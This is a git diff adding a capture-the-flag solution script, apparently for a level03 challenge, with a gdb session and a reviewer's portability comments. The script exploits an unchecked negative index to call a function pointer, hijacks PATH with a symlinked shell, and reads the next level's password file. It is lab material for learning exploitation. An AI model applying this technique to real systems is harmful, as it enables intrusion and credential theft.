Diffstat (limited to 'level03.sh')
-rw-r--r--level03.sh24
1 files changed, 24 insertions, 0 deletions
diff --git a/level03.sh b/level03.sh
new file mode 100644
index 0000000..7470514
--- /dev/null
+++ b/level03.sh
@@ -0,0 +1,24 @@
+#!/bin/sh
+
+# level03@ctf4:/tmp/tmp.lZLfBZODXa$ gdb /levels/level03
+# (gdb) break truncate_and_call
+# Breakpoint 1 at 0x8048780: file level03.c, line 57.
+# (gdb) run 1 something
+# Starting program: /levels/level03 1 something
+# Breakpoint 1, truncate_and_call (fns=0xffeecfec, index=1, user_string=0xffeed986 "something") at level03.c:57
+# 57 in level03.c
+# (gdb) n
+# 60 in level03.c
+# (gdb) p &buf
+# $1 = (char (*)[64]) 0xffeecf7c
+# (gdb) p fns
+# $2 = (fn_ptr *) 0xffeecfec
+# (gdb) p (0xffeecfec-0xffeecf7c)/4
+# $3 = 28
+# (gdb) p run
+# $4 = {int (const char *)} 0x804875b <run>
+# (gdb) quit
+
+ln -s /bin/sh "$(printf '\x5b\x87\x04\x08')"
+echo "cat /home/level04/.password" | PATH=.:$PATH /levels/level03 -28 "$(printf '\x5b\x87\x04\x08')"
+rm "$(printf '\x5b\x87\x04\x08')"
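Review bot: The last three lines each rebuild the same unnamed four-byte string with `printf '\x5b\x87\x04\x08'`, and POSIX does not require `printf` to support `\x` escapes, so under the `#!/bin/sh` shebang the result depends on which shell provides `sh`. Compute it once with octal escapes, `name=$(printf '\133\207\004\010')`, and use `"$name"` in the `ln`, the program argument and the `rm`. The gdb transcript is left for the reader to decode, so add a comment such as `# name = address of run (0x804875b), little-endian; -28 = (buf - fns)/4, both taken from the gdb session above`. The transcript suggests the target accepts a negative index with no lower-bound check, which would be the root cause to fix. That is inferred, since level03.c is not shown on this page.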